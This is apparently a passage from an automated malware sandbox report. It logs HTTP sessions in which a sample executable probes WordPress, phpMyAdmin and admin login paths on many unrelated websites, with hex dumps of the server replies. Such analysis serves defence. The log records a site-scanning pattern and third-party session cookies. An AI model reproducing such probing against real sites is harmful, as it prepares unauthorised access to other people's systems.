                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 65 74 2d 73 69 64 65 2d 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 54 61 6b 65 20 69 6d 6d 65 64 69 61 74 65 20 6f 77 6e 65 72 73 68 69 70 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 73 61 66 65 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 53 61 66 65 20 61 6e 64 20 73 65 63 75 72 65
                                                                                                                                                                                                    Data Ascii: et-side-ico.png" alt></div><div class="content"><span>Take immediate ownership</span></div></li><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/safesmallico.png" alt></div><div class="content"><span>Safe and secure


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    386192.168.2.44942466.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC262OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC553INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: Wor
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    387192.168.2.44951934.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC922INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 33 2e 33 36 39 31 30 33 35 31 37 32 31 38 38 31 33 34 35 36 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 53 65 72 76 65 72 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978383.3691035172188134562Cache-Control: public,max-age=0,must-revalidateServer:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC330INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1252INData Raw: 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74
                                                                                                                                                                                                    Data Ascii: ame="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" t
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1252INData Raw: 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6c 6f 63 61 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: ate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/app.js"></scrip
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC31INData Raw: 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: rification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    388192.168.2.46546781.19.159.644436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC239OUTGET /404/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grg17geblergasse.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://www.grg17geblergasse.at/-/-/-/-/-/-/-/-/-/-/
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC421INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 2c 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 77 70 2d 6a 73 6f 6e 2f 77 70 2f 76 32 2f 6d 65 64 69 61 2f 32 36 35 36 3e 3b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 3b 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 20 3c 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheLink: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/", <https://www.grg17geblergasse.at/wp-json/wp/v2/media/2656>; rel="alternate"; type="application/json", <https:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC7771INData Raw: 33 39 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65
                                                                                                                                                                                                    Data Ascii: 3957<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://www.grg17geblergasse.at/xmlrpc.php" /><script type="text/javascript">document.docume
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC6914INData Raw: 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d
                                                                                                                                                                                                    Data Ascii: .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;m
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC8192INData Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 64 69 76 69 2d 73 74 79 6c 65 2d 69 6e 6c 69 6e 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 44 69 76 69 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 6c 65 67 61 6e 74 74 68 65 6d 65 73 2e 63 6f 6d 2f 67 61 6c 6c 65 72 79 2f 64 69 76 69 2f 0a 56 65 72 73 69 6f 6e 3a 20 34 2e 32 32 2e 32 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 53 6d 61 72 74 2e 20 46 6c 65 78 69 62 6c 65 2e 20 42 65 61 75 74 69 66 75 6c 2e 20 44 69 76 69 20 69 73 20 74 68 65 20 6d 6f 73 74 20 70 6f 77 65 72 66 75 6c 20 74 68 65 6d 65 20 69 6e 20 6f 75 72 20 63 6f 6c 6c 65 63 74 69 6f 6e 2e 0a 41 75 74 68 6f 72 3a 20
                                                                                                                                                                                                    Data Ascii: 1f40<style id='divi-style-inline-inline-css' type='text/css'>/*!Theme Name: DiviTheme URI: http://www.elegantthemes.com/gallery/divi/Version: 4.22.2Description: Smart. Flexible. Beautiful. Divi is the most powerful theme in our collection.Author:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7822INData Raw: 74 2d 61 72 65 61 7b 77 69 64 74 68 3a 37 39 2e 31 32 35 25 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 33 70 78 7d 23 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 20 2e 63 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 32 65 32 65 32 7d 2e 65 74 5f 66 75 6c 6c 5f 77 69 64 74 68 5f 70 61 67 65 20 23 6c 65 66 74 2d 61 72 65 61 2c 2e 65 74 5f 6e 6f 5f 73 69 64 65 62 61 72 20 23 6c 65 66 74 2d 61 72 65 61 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 65 74 5f 66 75 6c 6c 5f 77 69
                                                                                                                                                                                                    Data Ascii: t-area{width:79.125%;padding-bottom:23px}#main-content .container:before{content:"";position:absolute;top:0;height:100%;width:1px;background-color:#e2e2e2}.et_full_width_page #left-area,.et_no_sidebar #left-area{float:none;width:100%!important}.et_full_wi
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC8192INData Raw: 31 66 34 30 0d 0a 31 30 30 25 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 30 30 25 20 2b 20 32 70 78 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 65 74 5f 70 62 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 70 61 74 74 65 72 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 7d 2e 65 74 5f 70 62 5f 77 69 74 68 5f 62 6f 72 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 33 33 33 7d 2e 70 6f 73 74 2d 70 61 73 73 77 6f 72 64 2d 72 65 71 75 69
                                                                                                                                                                                                    Data Ascii: 1f40100% + 2px) calc(100% + 2px);background-repeat:no-repeat;background-position:50%;overflow:hidden}.et_pb_background_pattern{background-position:0 0;background-repeat:repeat}.et_pb_with_border{position:relative;border:0 solid #333}.post-password-requi
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2582INData Raw: 69 67 6e 5f 72 69 67 68 74 2d 74 61 62 6c 65 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 2e 65 74 5f 70 62 5f 74 65 78 74 5f 61 6c 69 67 6e 5f 6a 75 73 74 69 66 69 65 64 2d 74 61 62 6c 65 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 65 74 5f 70 62 5f 6d 6f 72 65 5f 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 65 74 5f 6f 76 65 72 6c 61 79 2e 65 74 5f 70 62 5f 69 6e 6c 69 6e 65 5f 69 63 6f 6e 5f 70 68 6f 6e 65 3a 62 65 66 6f 72 65 2c 2e 65 74 5f 70 62 5f 69 6e 6c 69 6e 65 5f 69 63 6f 6e 5f 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e
                                                                                                                                                                                                    Data Ascii: ign_right-tablet{text-align:right}.et_pb_module.et_pb_text_align_justified-tablet{text-align:justify}}@media (max-width:767px){.et_pb_more_button{display:inline-block!important}.et_overlay.et_pb_inline_icon_phone:before,.et_pb_inline_icon_phone:before{con
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    389192.168.2.44946147.246.24.211443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC162OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: wonka.cc
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC734INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 53 50 2e 4e 45 54 5f 53 65 73 73 69 6f 6e 49 64 3d 75 75 6f 65 35 74 6f 31 70 69 69 7a 6d 6a 6b 69 71 6d 70 74 78 75 7a 77 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: TengineContent-Type: text/html; charset=utf-8Content-Length: 103Connection: closeDate: Sun, 26 Nov 2023 05:59:44 GMTCache-Control: privateSet-Cookie: ASP.NET_SessionId=uuoe5to1piizmjkiqmptxuzw; path=/; HttpOnly;
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC103INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6e 77 7a 69 6d 67 2e 77 65 7a 68 61 6e 2e 6e 65 74 2f 73 74 61 74 69 63 2d 6a 73 2f 70 61 67 65 34 30 34 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script src='https://nwzimg.wezhan.net/static-js/page404.js'></script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    390192.168.2.44922395.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC351OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=4f36ac64dc73c26adfab9dad01788b38|11f187638643e13d7bd1963991fac52b; OF=9lma3oral9i39bi8q8vm70o157
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://beachrecruitment.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC424INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:43 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    391192.168.2.449413104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
